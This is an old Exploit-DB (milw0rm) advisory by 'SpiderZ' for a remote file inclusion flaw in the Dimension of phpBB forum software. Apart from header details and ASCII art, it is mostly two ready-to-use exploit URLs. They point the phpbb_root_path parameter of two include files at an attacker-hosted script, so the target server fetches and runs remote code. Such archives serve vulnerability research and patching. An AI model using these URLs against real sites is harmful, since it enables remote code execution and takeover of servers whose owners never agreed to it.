Dimension of phpBB 0.2.6 - 'phpbb_root_path' Remote File Inclusions

EDB-ID:

2481

Author:

SpiderZ

Type:

webapps

Platform:

PHP

Published:

2006-10-05

_________________________________________________________________________


           /      \
        \  \  ,,  /  /
         '-.`\()/`.-'
        .--_'(  )'_--.
       / /` /`""`\ `\ \           * SpiderZ Hacking Security *
        |  |  ><  |  |
        \  \      /  /
            '.__.'


# Author: SpiderZ
# Dimension of phpBB Remote File Inclusion Vulnerability
# For: Dimension of phpBB 0.2.5 (phpBB 2.0.21)
# Site: www.spiderz.altervista.org
# Site02: www.spiderz.netsons.org
_________________________________________________________________________


# Remote File Inclusion

http://site.com/[path]/includes/themen_portal_mitte.php?phpbb_root_path=http://[Evil_script]

http://site.com/[path]/includes/logger_engine.php?phpbb_root_path=http://[Evil_script]


------------------------------------------------------------------------------

# Download: http://www.phpbb-dimension.de/dload.php?action=category&cat_id=16

------------------------------------------------------------------------------

# milw0rm.com [2006-10-05]